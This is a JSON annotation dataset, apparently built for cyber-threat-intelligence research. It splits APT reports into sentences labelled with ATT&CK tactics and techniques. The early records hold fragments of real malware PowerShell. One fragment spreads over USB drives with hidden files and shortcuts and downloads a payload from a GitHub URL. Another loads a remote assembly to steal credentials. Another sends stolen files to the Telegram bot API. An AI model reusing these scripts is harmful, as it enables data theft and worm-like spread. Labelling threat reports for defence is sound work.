"aptnotes-08_aptnotes_report-p27-s301-e98db4", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 27, "sentence_id": 301, "context_before": "\"\n$b+=$c\n}\n}\n}\nSet-ItemProperty \"HKCU:\\\\Environment\" -name \"Update\" -value $mid } } APPENDIX B. PowerShell script to later movement over removable device 26/29", "sentence_text": "[Net.ServicePointManager]::SecurityProtocol=@(\"Tls12\",\"Tls11\",\"Tls\",\"Ssl3\");\n$ErrorActionPreference=\"Continue\";\n$Query = \"select * from __InstanceCreationEvent within 5 where TargetInstance ISA 'Win32_LogicalDisk' and TargetInstance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p27-s303-9985e6", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 27, "sentence_id": 303, "context_before": "DriveType", "sentence_text": "= 2\";\n$Action = { (gwmi cim_logicaldisk|?{($_.drivetype -eq 2)-and(Test-path \"$($_.deviceid)\\\")}).DeviceID|%{ $uri = \"https://raw.githubusercontent.com/efimovah/abcd/main/xxx.gif\";\nStart-BitsTransfer -Source $uri -Destination \"$Env:tmp\\xxx.zip\";\nExpand-Archive -Path \"$env:temp\\xxx.zip\" -DestinationPath \"$env:temp\" -force cp \"$env:temp\\xxx\" \"$\\_\\dism\" -Recurse -Force;\nsc \"$\\_\\system.bat\" -value \"@echo off`ncd %cd%dism`nstart dism.exe`nexit\";\nattrib +s +h \"$\\_\\dism\";attrib +s +h \"$\\_\\dism\\*.*\";attrib +s +h \"$\\_\\system.bat\";\n(Gci \"$\\_\\\" -Directory -force)|?{$_.name -notin ('dism','$RECYCLE.BIN','System Volume Information')}|%{ attrib +s +h \"$($_.fullname)\" $WshShell = New-Object -comObject", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p27-s305-6016e2", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 27, "sentence_id": 305, "context_before": "WScript.", "sentence_text": "Shell $Shortcut = $WshShell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p27-s306-6f3a16", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 27, "sentence_id": 306, "context_before": "Shell $Shortcut = $WshShell.", "sentence_text": "CreateShortcut(\"$($_.fullname).lnk\")\n$Shortcut.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p27-s307-42bde6", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 27, "sentence_id": 307, "context_before": "CreateShortcut(\"$($_.fullname).lnk\")\n$Shortcut.", "sentence_text": "TargetPath = \"%SystemRoot%\\System32\\cmd.exe\" $Shortcut.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p27-s308-878b52", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 27, "sentence_id": 308, "context_before": "TargetPath = \"%SystemRoot%\\System32\\cmd.exe\" $Shortcut.", "sentence_text": "Arguments = \"/c start explorer $($_.name) && system.bat && exit\" $Shortcut.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p27-s309-5b576e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 27, "sentence_id": 309, "context_before": "Arguments = \"/c start explorer $($_.name) && system.bat && exit\" $Shortcut.", "sentence_text": "IconLocation = \"%SystemRoot%\\System32\\SHELL32.dll,4\" $Shortcut.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p27-s310-c2f127", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 27, "sentence_id": 310, "context_before": "IconLocation = \"%SystemRoot%\\System32\\SHELL32.dll,4\" $Shortcut.", "sentence_text": "WorkingDirectory = \"%cd%\" $Shortcut.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p27-s311-c538fe", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 27, "sentence_id": 311, "context_before": "WorkingDirectory = \"%cd%\" $Shortcut.", "sentence_text": "Save()\n}\n}\n};\nRegister-WmiEvent -Query $Query -Action $Action -SourceIdentifier USBFlashDrive APPENDIX C. PowerShell script to theft of credentials 27/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s313-2122af", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 313, "context_before": "[Net.", "sentence_text": "ServicePointManager]::SecurityProtocol =", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s314-b8bc06", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 314, "context_before": "ServicePointManager]::SecurityProtocol =", "sentence_text": "[Net.SecurityProtocolType]::Tls12;", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s315-58b58c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 315, "context_before": "[Reflection.Assembly]::Load([System.", "sentence_text": "[Reflection.Assembly]::Load([System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s316-b67dfe", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 316, "context_before": "[Reflection.Assembly]::Load([System.", "sentence_text": "Convert]::FromBase64String((New-Object\nSystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s318-45764c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 318, "context_before": "Net.", "sentence_text": "WebClient).DownloadString(\"\"))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s319-774f0b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 319, "context_before": "WebClient).DownloadString(\"\"))", "sentence_text": "| Out-Null;[kuky.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s320-ce5392", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 320, "context_before": "| Out-Null;[kuky.", "sentence_text": "Program]::Main();\nStart-Sleep 60;\ncp -path \"$env:tmp\\\\backuplog\" -Destination \"$env:tmp\\\\backuplog1\" -recurse -force;\n$file = \"$env:tmp\\\\backuplog1\";\n$ascii = [System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s322-b3ccb7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 322, "context_before": "Text.", "sentence_text": "Encoding]::ascii;\nCompress-Archive -Path $File -Destination \"$file.zip\" -Force;\n$file = \"$file.zip\" $reg = \"HKCU:\\\\Environment\" $token,$chat_id = (gp $reg -name GUID).GUID -split \"::\" Add-Type -AssemblyName System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s325-800784", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 325, "context_before": "Net.", "sentence_text": "Add($(New-Object System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s327-8896ea", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 327, "context_before": "Net.", "sentence_text": "StringContent $Chat_ID), 'chat_id')", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s328-fdfc58", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 328, "context_before": "StringContent $Chat_ID), 'chat_id')", "sentence_text": "$Content = [System.IO.File]::ReadAllBytes($file)\n$byte = New-Object System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s332-14eac4", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 332, "context_before": "Headers.", "sentence_text": "Add('Content-Type','text/plain')", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s333-fea6d7", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 333, "context_before": "Add('Content-Type','text/plain')", "sentence_text": "$name = $ascii.getstring($ascii.getbytes(\"$($env:COMPUTERNAME)_$($file)\")) -replace ':|\\\\\\\\|\\\\?','_' $form.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s334-7c5d89", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 334, "context_before": "$name = $ascii.getstring($ascii.getbytes(\"$($env:COMPUTERNAME)_$($file)\")) -replace ':|\\\\\\\\|\\\\?','_' $form.", "sentence_text": "Add($byte, 'document', $name)\n$ms = new-object System.IO.MemoryStream", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s336-278046", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 336, "context_before": "$form.", "sentence_text": "CopyToAsync($ms).Wait()\nirm -Method Post -Body $ms.ToArray() -Uri \"\" -ContentType $form.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p28-s338-5b3bd8", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 28, "sentence_id": 338, "context_before": "Headers.", "sentence_text": "ContentType.ToString()\nrm $file -Force -Recurse\", APPENDIX D. PowerShell script to exfiltrate documents from common network resource 28/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p29-s340-26b720", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 29, "sentence_id": 340, "context_before": "Text.", "sentence_text": "Encoding]::ascii;\nCompress-Archive -Path $File -Destination \"$file.zip\" -Force;\n$file = \"$file.zip\" $chat_id=CHANGED $token=\"CHANGED\" Add-Type -AssemblyName System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p29-s343-53b2f0", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 29, "sentence_id": 343, "context_before": "Net.", "sentence_text": "Add($(New-Object System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p29-s345-b2efa2", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 29, "sentence_id": 345, "context_before": "Net.", "sentence_text": "StringContent $Chat_ID), 'chat_id')", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p29-s346-2377f9", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 29, "sentence_id": 346, "context_before": "StringContent $Chat_ID), 'chat_id')", "sentence_text": "$Content = [System.IO.File]::ReadAllBytes($file)\n$byte = New-Object System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p29-s350-ba8873", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 29, "sentence_id": 350, "context_before": "Headers.", "sentence_text": "Add('Content-Type','text/plain')", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p29-s351-a0e800", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 29, "sentence_id": 351, "context_before": "Add('Content-Type','text/plain')", "sentence_text": "$name = $ascii.getstring($ascii.getbytes(\"$($env:COMPUTERNAME)_$($file)\")) -replace ':|\\\\\\\\|\\\\?','_' $form.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p29-s352-0b1de9", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 29, "sentence_id": 352, "context_before": "$name = $ascii.getstring($ascii.getbytes(\"$($env:COMPUTERNAME)_$($file)\")) -replace ':|\\\\\\\\|\\\\?','_' $form.", "sentence_text": "Add($byte, 'document', $name)\n$ms = new-object System.IO.MemoryStream", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p29-s354-a75839", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 29, "sentence_id": 354, "context_before": "$form.", "sentence_text": "CopyToAsync($ms).Wait()\nirm -Method Post -Body $ms.ToArray() -Uri \"https://api.telegram.org/bot$token/sendDocument\" -ContentType $form.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p29-s356-2b4a14", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 29, "sentence_id": 356, "context_before": "Headers.", "sentence_text": "ContentType.ToString()\nrm $file -Force -Recurse 29/29", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p1-s1-e331e8", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "Joe Fasulo Source: IBM Security Intelligence As of December 2023, IBM X-Force has uncovered multiple lure documents that predominately feature the ongoing Israel-Hamas war to facilitate the delivery of the ITG05 exclusive Headlace backdoor.", "relevant": "yes", "tactic": [ { "name": "Initial Access", "id": "TA0001" } ], "techniques": [ { "name": "Phishing", "id": "T1566" } ], "procedure": "Lure documents are used to deliver the Headlace backdoor.", "entities": [ { "text": "facilitate the delivery", "start": 175, "end": 198, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p1-s2-50f283", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "Joe Fasulo Source: IBM Security Intelligence As of December 2023, IBM X-Force has uncovered multiple lure documents that predominately feature the ongoing Israel-Hamas war to facilitate the delivery of the ITG05 exclusive Headlace backdoor.", "sentence_text": "The newly discovered campaign is directed against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance and diplomatic centers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Target entities across multiple countries using authentic documents as lures.", "entities": [ { "text": "directed against targets based in at least 13 nations worldwide", "start": 33, "end": 96, "label": "Action" }, { "text": "leverages authentic documents created by academic, finance and diplomatic centers", "start": 101, "end": 182, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p1-s3-e1bf08", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "The newly discovered campaign is directed against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance and diplomatic centers.", "sentence_text": "ITG05’s infrastructure ensures only targets from a single specific country can receive the malware, indicating the highly targeted nature of the campaign.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Restrict malware delivery to targets from a specific country using controlled infrastructure.", "entities": [ { "text": "ITG05", "start": 0, "end": 5, "label": "ThreatActor" }, { "text": "ensures only targets from a single specific country can receive the malware", "start": 23, "end": 98, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p1-s4-5bbee1", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "ITG05’s infrastructure ensures only targets from a single specific country can receive the malware, indicating the highly targeted nature of the campaign.", "sentence_text": "The contents of each lure contain themes relevant to a unique audience interested in research and policy creation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p1-s5-58602d", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "The contents of each lure contain themes relevant to a unique audience interested in research and policy creation.", "sentence_text": "The nature of the lures suggests activity is directed at entities with direct influence on the allocation of humanitarian aid, primarily those based in Europe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p1-s6-8aee99", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "The nature of the lures suggests activity is directed at entities with direct influence on the allocation of humanitarian aid, primarily those based in Europe.", "sentence_text": "Our discovery includes multiple legitimate documents associated with finance, think tanks, educational organizations and government and nongovernment organizations (NGOs) leveraged as lure materials.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p1-s7-0d5741", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "Our discovery includes multiple legitimate documents associated with finance, think tanks, educational organizations and government and nongovernment organizations (NGOs) leveraged as lure materials.", "sentence_text": "These files are featured in larger infection chains associated with the delivery of the ITG05 exclusive Headlace backdoor capable of facilitating multiple malicious actions on objectives.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Use lure documents within infection chains to deliver the Headlace backdoor.", "entities": [ { "text": "delivery of the ITG05 exclusive Headlace backdoor", "start": 72, "end": 121, "label": "Action" }, { "text": "ITG05", "start": 88, "end": 93, "label": "ThreatActor" }, { "text": "Headlace", "start": 104, "end": 112, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p1-s8-88d8e5", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "These files are featured in larger infection chains associated with the delivery of the ITG05 exclusive Headlace backdoor capable of facilitating multiple malicious actions on objectives.", "sentence_text": "It is unclear precisely how many entities were impacted by the campaign, but our analysis indicates that organizations in the following countries were", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p2-s9-020108", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 2, "sentence_id": 9, "context_before": "It is unclear precisely how many entities were impacted by the campaign, but our analysis indicates that organizations in the following countries were", "sentence_text": "Of note, all but one of the 13 nations featured in the geolocations perimeters for downloading Headlace are United Nations Human Rights Council members.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p2-s10-ef19a5", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 2, "sentence_id": 10, "context_before": "Of note, all but one of the 13 nations featured in the geolocations perimeters for downloading Headlace are United Nations Human Rights Council members.", "sentence_text": "It is highly likely the compromise of any echelon of global foreign policy centers may aid officials’ interests with advanced insight into critical dynamics surrounding the International Community's (IC) approach to competing priorities for security and humanitarian assistance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p2-s12-18d826", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 2, "sentence_id": 12, "context_before": "Key Findings\n•", "sentence_text": "This is the first known use of the Israel-Hamas conflict by ITG05 to conduct campaigns delivering the exclusive Headlace backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Leverage Israel-Hamas conflict themes to conduct campaigns delivering Headlace backdoor.", "entities": [ { "text": "ITG05", "start": 60, "end": 65, "label": "ThreatActor" }, { "text": "conduct campaigns delivering the exclusive Headlace backdoor", "start": 69, "end": 129, "label": "Action" }, { "text": "Headlace", "start": 112, "end": 120, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p2-s14-139c58", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "•", "sentence_text": "• X-Force observed the deployment of Headlace and secondary payloads to be specifically targeted toward at least 13 nations.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deploy Headlace and secondary payloads targeting multiple nations.", "entities": [ { "text": "deployment of Headlace and secondary payloads", "start": 23, "end": 68, "label": "Action" }, { "text": "Headlace", "start": 37, "end": 45, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p2-s16-d41d8b", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "•", "sentence_text": "Some of the uncovered lures are contained in a .RAR archive exploiting the CVE-2023-38831 vulnerability, others use DLL-hijacking to run Headlace.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" }, { "id": "T1574.001", "name": "Hijack Execution Flow: DLL Search Order Hijacking" } ], "procedure": "Deliver lures via RAR archive exploiting CVE-2023-38831 and execute Headlace using DLL hijacking.", "entities": [ { "text": ".RAR archive exploiting the CVE-2023-38831 vulnerability", "start": 47, "end": 103, "label": "Action" }, { "text": "use DLL-hijacking to run Headlace", "start": 112, "end": 145, "label": "Action" }, { "text": "CVE-2023-38831", "start": 75, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "Headlace", "start": 137, "end": 145, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p2-s17-5a508e", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "Some of the uncovered lures are contained in a .RAR archive exploiting the CVE-2023-38831 vulnerability, others use DLL-hijacking to run Headlace.", "sentence_text": "Background\nIn early September 2023, CERT-UA reported APT28 was attempting to use new malware named Headlace to access a critical energy infrastructure entity in Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Attempt to use Headlace malware to gain access to a critical energy infrastructure entity.", "entities": [ { "text": "APT28", "start": 53, "end": 58, "label": "ThreatActor" }, { "text": "attempting to use new malware named Headlace to access a critical energy infrastructure entity", "start": 63, "end": 157, "label": "Action" }, { "text": "Headlace", "start": 99, "end": 107, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p2-s18-2facd7", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "Background\nIn early September 2023, CERT-UA reported APT28 was attempting to use new malware named Headlace to access a critical energy infrastructure entity in Ukraine.", "sentence_text": "This involved APT28 using the Mockbin and Mocky API websites to stage malicious archives retrieved by Javascript droppers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use Mockbin and Mocky APIs to stage and deliver malicious archives via JavaScript droppers.", "entities": [ { "text": "APT28", "start": 14, "end": 19, "label": "ThreatActor" }, { "text": "using the Mockbin and Mocky API websites to stage malicious archives retrieved by Javascript droppers", "start": 20, "end": 121, "label": "Action" }, { "text": "Mockbin", "start": 30, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "Mocky", "start": 42, "end": 47, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p2-s19-359623", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "This involved APT28 using the Mockbin and Mocky API websites to stage malicious archives retrieved by Javascript droppers.", "sentence_text": "In late 2023, X-Force uncovered eight lure documents created between early August and early December 2023 likely leveraged in phishing campaigns crafted to ultimately distribute ITG05's Headlace backdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s20-cb15f1", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 20, "context_before": "In late 2023, X-Force uncovered eight lure documents created between early August and early December 2023 likely leveraged in phishing campaigns crafted to ultimately distribute ITG05's Headlace backdoor.", "sentence_text": "the Republic of Belarus on Economic Cooperation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s21-822d02", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 21, "context_before": "the Republic of Belarus on Economic Cooperation.", "sentence_text": "The use of official documents as lure material is a departure from previously observed ITG05 activity featuring the delivery of the Headlace backdoor, which featured adult-themed material to engender victim engagement.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s22-68c69c", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 22, "context_before": "The use of official documents as lure material is a departure from previously observed ITG05 activity featuring the delivery of the Headlace backdoor, which featured adult-themed material to engender victim engagement.", "sentence_text": "This change in lure content may be indicative of ITG05's increased emphasis on a unique target audience whose interests would prompt interaction with material impacting emerging policy creation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s23-17c1c7", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 23, "context_before": "This change in lure content may be indicative of ITG05's increased emphasis on a unique target audience whose interests would prompt interaction with material impacting emerging policy creation.", "sentence_text": "State-sponsored cyber capabilities will likely continue to be leveraged to furnish domestic decision- makers with exclusive access to the political resolve and resource priorities of the IC and individual states.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s24-79f7a1", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 24, "context_before": "State-sponsored cyber capabilities will likely continue to be leveraged to furnish domestic decision- makers with exclusive access to the political resolve and resource priorities of the IC and individual states.", "sentence_text": "Analysis: From decoy documents to phishing lures Previously, ITG05 operations featuring the Headlace backdoor were preceded by numerous decoy documents featuring adult themes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s25-9ceffb", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 25, "context_before": "Analysis: From decoy documents to phishing lures Previously, ITG05 operations featuring the Headlace backdoor were preceded by numerous decoy documents featuring adult themes.", "sentence_text": "The majority of the uncovered lures feature English-language text except for a Turkish language and a single Russian-language document.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s26-d1705e", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 26, "context_before": "The majority of the uncovered lures feature English-language text except for a Turkish language and a single Russian-language document.", "sentence_text": "The text of each of the decoys contains themes that would likely not appear as alerting to a unique audience interested in research and policy creation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s27-53257d", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 27, "context_before": "The text of each of the decoys contains themes that would likely not appear as alerting to a unique audience interested in research and policy creation.", "sentence_text": "The following is a selection of uncovered lure documents used in conjunction with Headlace:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s28-661f3d", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 28, "context_before": "The following is a selection of uncovered lure documents used in conjunction with Headlace:", "sentence_text": "Example lure 1: Letter of invitation to the expert discussion on the Razumkov Centre", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s29-88d574", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 29, "context_before": "Example lure 1: Letter of invitation to the expert discussion on the Razumkov Centre", "sentence_text": "The earliest uncovered lure document titled \"Letter of invitation to the expert discussion on the Razumkov Centre,\" dates from early September 2023 and was first reported by Google TAG.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s30-e2ad33", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 30, "context_before": "The earliest uncovered lure document titled \"Letter of invitation to the expert discussion on the Razumkov Centre,\" dates from early September 2023 and was first reported by Google TAG.", "sentence_text": "It leverages a publicly available document uploaded one day preceding the presentation of the legitimate event hosted by the Razumkov Centre in partnership with the United States Agency for International Development (USAID) under the auspices of the USAID/ENGAGE pact.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s31-d25995", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 31, "context_before": "It leverages a publicly available document uploaded one day preceding the presentation of the legitimate event hosted by the Razumkov Centre in partnership with the United States Agency for International Development (USAID) under the auspices of the USAID/ENGAGE pact.", "sentence_text": "The invitation presents the findings of the paper \"War of Attrition: Comparison of Potentials and Assessment of 